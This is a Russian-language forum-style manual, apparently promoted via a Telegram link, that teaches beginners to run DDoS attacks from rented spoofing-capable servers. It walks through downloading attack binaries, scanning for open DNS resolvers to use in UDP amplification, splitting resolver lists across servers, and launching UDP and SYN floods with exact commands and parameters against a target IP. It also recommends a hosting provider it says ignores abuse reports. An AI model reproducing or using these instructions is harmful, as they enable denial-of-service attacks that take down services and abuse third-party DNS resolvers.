льь
https://t.me/darkmoneyyКак сказал один мой друг: виндовый ддос бот есть шлак, в любых его проявлениях!
Так оно и есть, эпоха ддос атак с многочисленных ботнетов давно прошла. Причин тому достаточно:
- нет нормальных загрузок, продают в основном одно говно в сто рук
- нет нормального софта в паблике и в продаже, продают различные переделки с сорцов диртджампера, изменив несколько строчек кода и дизайн админки
- из за причин выше боты мрут буквально как мухи, содержать большой ддос ботнет выходит очень затратно
- средства защиты от ддос атак сейчас доступны каждому. некоторые хостеры держат 100/150/200 гбит. Провести такую атаку используя винботов нереально. Даже если боты сгенерируют столько траффика (для этого нужны сотни тысяч ботов!!), антиддос системы все равно быстренько перебанят всех ботов и атака будет отбита.
Современные ддосеры уже давно позабыли что такое дирт джамперы и г-боты и проводят атаки с выделенных nix серверов с широкими каналами. И сервера не простые, а те, где работает ip spoofing (подмена обратного айпи адреса)
В основном это upd amplification и syn flood, который в nix благо может быть реализован.
В этом небольшом, так сказать, мануале, я покажу новичкам как проводить такие атаки.
Нам понадобится:
- SSH клиент, для отдачи команд серверам. Рекомендую xshell
Скачать: http://www.netsarang.com/download/down_xsh.html
- FTP клиент, что бы распределять днс листы по серверам, любой который вам нравится. Можно юзать wget, но когда серверов много через фтп клиент удобнее
- Утилитка для разделения txt файла на части. Я использовал split
Скачать: http://www.sendspace.com/file/4ai08a
- Собственно сами скрипты udp, syn и сканнер открытых днс резолверов для udp amplification (так же добавил ntp attack и ntp checker с аналогичным принципом использования)
Скачать: https://mega.co.nz/#!6xl3SIaK!stJbF...x_nVoVzENC7LeEA
- Ну и конечно сами сервера. Например http://ecatel.co.uk/ любимый всеми ддосерами. На серверах по 155 евро спуффинг благо еще работает.
Покупаем centos или debian 64 bit, без панели управления. Она нам не нужна, нам нужен только ssh.
В конце мануала я еще дам ссылки на хостеров у которых можно арендовать нужные сервера.
Ну вот, предположим вы купили сервер. Коннектимся к нему через ssh клиент.
Сначала установим glibc необходимый для работы скриптов:
yum install glibc.i686 если centos
apt-get install glibc.i686 если debian
Далее заливаем udp, syn и scan на сервер через фтп клиент или
wget http://host.com/udp и тд.
Ставим на них права 777 в фтп клиенте или
chmod -R 777 syn
На этом пока все, теперь переходим к днс листам.
Для udp amplification нам понадобятся списки открытых днс резолверов с нужным нам ответом от них.
Благо хостеру ecatel абсолютно похуй чем вы занимаетесь на своих серверах, поэтому можно смело сканить прямо с них. В других датацентрах я бы не советовал так делать, потому что большинство абуз приходят как раз таки за скан. И вообще что бы насканить лист хватит какой нибудь впски с 100 мбит каналом.
На каждый сервер нужно примерно 20к днсок, которые мы насканим при помощи скрипта scan. Учтите что на каждый сервер нужен отдельный лист, поэтому если у вас несколько серверов, мы насканим один большой лист и распилим его на нужное количество частей.
Пример использования:
./scan 1 99999 list.txt 3 admin.gull.ca 3800
Где:
1 - начало диапазона
99999 - конец диапазона
list.txt - файл куда будут сохранятся днски
3 - количество потоков, 3 как раз на гигабитный канал
admin.gull.ca - домен для скана с кучей А записей
3800 - размер ответа в байтах.
Мануал по тому как сделать свой домен для скана я приложу чуть позже в дополнение к этому мануалу, а пока домены берем халявные у этих пидоров:
http://dnsamplificationattacks.blogspot.com/
Проверяем их командой dig:
dig A admin.gull.ca
или
dig ANY admin.gull.ca
Если ответ 3800+ - смело сканим на этот домен.
И так с этим разобрались, у нас есть готовый list.txt c днсками внутри. Теперь нужно распилить его утилиткой split на нужное количество частей.
Например лист получился 10598412 байт, нужно 3 листа на 3 сервера. Запускаем через cmd:
split list.txt 3532804
И утилитка порежет list.txt на куски по 3532804 байт, то есть на 3 равные части.
Теперь берем эти листы и распределяем по серверам.
Можете другой утилиткой это делать, главное принцип понятен.
Готово? Можно ддосить
Udp flood запускаем так:
./udp 121.2.2.10 80 list.txt 99 1000
80 - порт
list.txt - лист наш естественно
99 - количетсво потоков, больше 100 ставить не рекомендую
1000 - длительность атаки в секундах
Syn flood запускаем так:
./syn 121.2.2.10 21 100 -1 1000
21 - порт
100 - количество потоков, больше 100 тоже не стоит ставить
-1 - лимит pps, то есть -1 это без лимита
1000 - длительность атаки в секундах
Один сервер генерирует около 10-11 гбит udp траффика и около 1 млн pps syn пакетов. Это именно для серверов ecatel. В других датацентрах ппс и гигабиты на выходе могут отличаться.
Использовать сервера в разы эффективнее и дешевле обходится чем содержание большого ботнета.
Да, все делается ручками, это вам не штормбот . Зато на халяву